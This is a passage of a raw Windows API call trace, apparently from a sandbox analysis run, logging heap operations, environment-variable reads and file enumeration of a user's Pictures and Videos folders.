lpFilePart=0x8bf658*="waKMSqrywnXqjmY3STm.bmp") returned 0x3e [0257.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f1fe0 | out: hHeap=0x25c0000) returned 1 [0257.004] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\waKMSqrywnXqjmY3STm.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\wakmsqrywnxqjmy3stm.bmp")) returned 0xffffffff [0257.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3190 | out: hHeap=0x25c0000) returned 1 [0257.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0257.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0257.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0257.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0257.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0257.004] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0257.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0257.004] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0257.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d720 | out: hHeap=0x25c0000) returned 1 [0257.004] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0257.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0257.004] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0257.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0257.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0257.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0257.004] CharUpperBuffW (in: lpsz="A4B00E03609", cchLength=0xb | out: lpsz="A4B00E03609") returned 0xb [0257.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0257.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0257.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0257.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1748 [0257.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0257.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0257.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0257.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0257.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0257.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0257.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0257.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0257.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0257.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0257.005] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0257.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0257.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0257.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa740 [0257.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0257.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0257.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9b70 [0257.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0257.005] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf2c0, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0257.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0257.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0257.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bf8 [0257.006] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0257.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0257.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0257.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0257.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0257.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0257.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0257.006] CharUpperBuffW (in: lpsz="SSA4B00E03609", cchLength=0xd | out: lpsz="SSA4B00E03609") returned 0xd [0257.006] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0257.006] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0257.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0257.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0257.006] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0257.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0257.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0257.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0257.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0257.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0257.006] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0257.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0257.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0257.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0257.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0257.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0257.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0257.007] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0257.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0257.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0257.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0257.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0257.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0257.007] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0257.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0257.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0257.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0257.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0257.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0257.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0257.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0257.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0257.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0257.007] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0257.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0257.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0257.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0257.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0257.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0257.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0257.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0257.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0257.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0257.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x60) returned 0x240da88 [0257.008] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*.*", lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xcede9290, ftLastAccessTime.dwHighDateTime=0x1d509d6, ftLastWriteTime.dwLowDateTime=0xcede9290, ftLastWriteTime.dwHighDateTime=0x1d509d6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xff8, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0xaa5960 [0257.008] FindNextFileW (in: hFindFile=0xaa5960, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xcede9290, ftLastAccessTime.dwHighDateTime=0x1d509d6, ftLastWriteTime.dwLowDateTime=0xcede9290, ftLastWriteTime.dwHighDateTime=0x1d509d6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xff8, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0257.008] FindNextFileW (in: hFindFile=0xaa5960, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc1f1edd0, ftCreationTime.dwHighDateTime=0x1d4ca4c, ftLastAccessTime.dwLowDateTime=0xa3ba3090, ftLastAccessTime.dwHighDateTime=0x1d4d026, ftLastWriteTime.dwLowDateTime=0xa3ba3090, ftLastWriteTime.dwHighDateTime=0x1d4d026, nFileSizeHigh=0x0, nFileSizeLow=0xa6ab, dwReserved0=0xff8, dwReserved1=0x60, cFileName="4Qauyoz6.avi", cAlternateFileName="")) returned 1 [0257.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0257.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1a) returned 0x24b56a8 [0257.008] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0257.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0257.008] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0257.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0257.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0257.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0257.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0257.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0257.009] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0257.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0257.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0257.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0257.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0257.009] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0257.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0257.009] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0257.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0257.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0257.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0257.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0257.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0257.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0257.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0257.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0257.009] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0257.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0257.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0257.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0257.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0257.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0257.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0257.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0257.009] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0257.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0257.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0257.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0257.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0257.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0257.010] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0257.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0257.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0257.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0257.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0257.010] FindNextFileW (in: hFindFile=0xaa5960, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9fefd280, ftCreationTime.dwHighDateTime=0x1d4c9cd, ftLastAccessTime.dwLowDateTime=0x5136ea10, ftLastAccessTime.dwHighDateTime=0x1d4c53c, ftLastWriteTime.dwLowDateTime=0x5136ea10, ftLastWriteTime.dwHighDateTime=0x1d4c53c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x24ab310, dwReserved1=0x25c6e50, cFileName="5WsMFJk0dr95l c", cAlternateFileName="5WSMFJ~1")) returned 1 [0257.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0257.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0257.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0257.010] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0257.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0257.010] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0257.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0257.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0257.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0257.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0257.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0257.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0257.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0257.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0257.011] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0257.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0257.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0257.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0257.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0257.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0257.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0257.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x30) returned 0x24b3538 [0257.011] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0257.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0257.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0257.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0257.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0257.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0257.011] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0257.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0257.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0257.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0257.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0257.012] FindNextFileW (in: hFindFile=0xaa5960, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7241f90, ftCreationTime.dwHighDateTime=0x1d4d409, ftLastAccessTime.dwLowDateTime=0xe8cee1d0, ftLastAccessTime.dwHighDateTime=0x1d4cf2c, ftLastWriteTime.dwLowDateTime=0xe8cee1d0, ftLastWriteTime.dwHighDateTime=0x1d4cf2c, nFileSizeHigh=0x0, nFileSizeLow=0x75ee, dwReserved0=0x24a9f60, dwReserved1=0x25c6e50, cFileName="7qrN.mkv", cAlternateFileName="")) returned 1 [0257.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0257.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0257.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0257.012] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0257.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0257.012] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0257.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0257.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0257.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0257.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0257.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0257.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0257.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0257.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0257.012] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0257.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0257.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0257.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0257.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0257.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0257.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0257.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0257.012] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0257.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0257.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0257.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0257.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0257.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0257.013] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0257.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0257.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0257.013] RtlAllocateHeap 